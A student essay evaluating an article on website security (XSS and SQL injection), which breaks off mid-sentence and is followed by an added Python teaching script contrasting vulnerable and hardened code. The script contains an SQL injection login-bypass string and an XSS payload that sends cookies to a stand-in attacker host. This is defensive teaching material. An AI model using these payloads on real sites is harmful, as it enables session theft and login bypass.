Website Security Article Evaluation
Anthony Hines Jr.
CMGT/441
July 27, 2014
Vance Collins
Introduction
Website security is incredibly important in today's world. Users around the globe are connected to the Internet and browsing websites 24 hours a day, seven days a week, all year long. Most individuals will hopefully have some basic knowledge of how to protect themselves and their devices against web-based attacks, whether by those attempting to take control of another person's device for their own purposes or by those trying to steal personal information in order to access institutions the victim uses, such as banks and places of employment.
Article Overview
The article used for this Website Security Evaluation asks the question: are general, non-technically inclined users the reason websites are such a prime target for attacks? It begins with a technical explanation of what happens when a user enters a website address and clicks "OK". It then presents the main types of web-based attacks and gives a few options for combating them and better protecting websites.
Main types of vulnerabilities and ways to improve security
According to the article, there are four main website security vulnerabilities: path traversal, cross-site scripting, cross-site request forgery and SQL injection (Heilmann, 2010). This evaluation describes what the top two attacks do and ways to combat them.
Cross-site scripting (XSS) - This occurs when a website owner lets visitors change the way the website displays; the article uses changing colours as its example. If the values visitors enter are placed directly into the page's code, they can add almost anything they want. Once a visitor has injected JavaScript with additional commands, they can read out cookies, open forms that ask the user to enter passwords or credit-card details, and execute viruses and worms (Heilmann, 2010). Ways to combat this are to never insert untrusted data except in allowed locations, to make sure PHP is configured correctly, and to be vigilant about what comes in through the URI. The last two (PHP configuration and URI input) are important because the variables to prevent are the ones that become global variables, which is what PHP's register_globals setting does with incoming request parameters (Heilmann, 2010). That means roughly seven billion potential attackers can attempt to add variables and extra code to carry out malicious deeds.
SQL injection - This is when a malicious SQL statement is deliberately entered into an entry field so that the database executes it; for example, a statement that dumps the database contents to the attacker. Per the article, the best way to combat this type of attack is to sanitize whatever the user enters into any field on the website (Heilmann, 2010). Sanitizing the user's input effectively asserts that the input is clean of any misdirection of information (Weiss, 2012). It is useful because it means there are no hidden commands
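The following is an added example, not code from the article or from this evaluation, that shows the two attacks above side by side with their fixes. It is written in Python with the standard-library sqlite3 module rather than the PHP the article discusses, and the user table, the colour-picker page and the attacker inputs are constructed for illustration. The SQL fix shown is a parameterized query, which keeps the attacker's text as data no matter what it contains; this is the stronger form of the "sanitize input" advice above, because escaping alone is easy to get wrong. The XSS fix follows the article's rule of only inserting untrusted data in allowed locations: the colour is restricted to an allowlist and the visitor's name is HTML-escaped before it reaches the page.

```python
"""Vulnerable and hardened handling of user input (added illustration)."""
import html
import sqlite3

# Constructed sample data: a tiny in-memory user table.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (name TEXT, password TEXT)")
    conn.executemany(
        "INSERT INTO users VALUES (?, ?)",
        [("alice", "s3cret"), ("bob", "hunter2")],
    )
    return conn


# --- SQL injection ---------------------------------------------------------

def login_vulnerable(conn, name, password):
    """Builds the query by string concatenation, so the attacker's text
    becomes part of the SQL statement itself."""
    query = (
        "SELECT name FROM users WHERE name = '" + name
        + "' AND password = '" + password + "'"
    )
    return [row[0] for row in conn.execute(query)]


def login_parameterized(conn, name, password):
    """Sends the statement and the values separately; the database never
    parses the user's text as SQL, so quotes and comments are harmless."""
    query = "SELECT name FROM users WHERE name = ? AND password = ?"
    return [row[0] for row in conn.execute(query, (name, password))]


# --- Cross-site scripting --------------------------------------------------

# Hypothetical colour-picker feature, as in the article's example.
ALLOWED_COLORS = {"black", "red", "green", "blue"}


def render_greeting_vulnerable(color, name):
    """Inserts both visitor-controlled values straight into the HTML."""
    return '<p style="color:' + color + '">Hello, ' + name + "</p>"


def render_greeting_hardened(color, name):
    """Colour may only take values from the allowlist (an 'allowed location'
    for untrusted data); the name is escaped so <, >, quotes and & cannot
    open a tag or attribute."""
    safe_color = color if color in ALLOWED_COLORS else "black"
    return '<p style="color:' + safe_color + '">Hello, ' + html.escape(name) + "</p>"


if __name__ == "__main__":
    conn = make_db()
    # Constructed attacker input: turns the WHERE clause into
    # (name='alice' AND password='') OR '1'='1', which matches every row.
    payload = "' OR '1'='1"
    print("vulnerable:", login_vulnerable(conn, "alice", payload))
    print("parameterized:", login_parameterized(conn, "alice", payload))

    evil_name = "<script>document.location='http://attacker.example/?c='+document.cookie</script>"
    print(render_greeting_vulnerable("red", evil_name))
    print(render_greeting_hardened("red", evil_name))
```

Running the script shows the vulnerable login returning both users for a password the attacker never knew, while the parameterized version returns nothing; likewise the vulnerable greeting emits the injected script tag verbatim, whereas the hardened one prints it as inert text and falls back to the default colour for anything outside the allowlist.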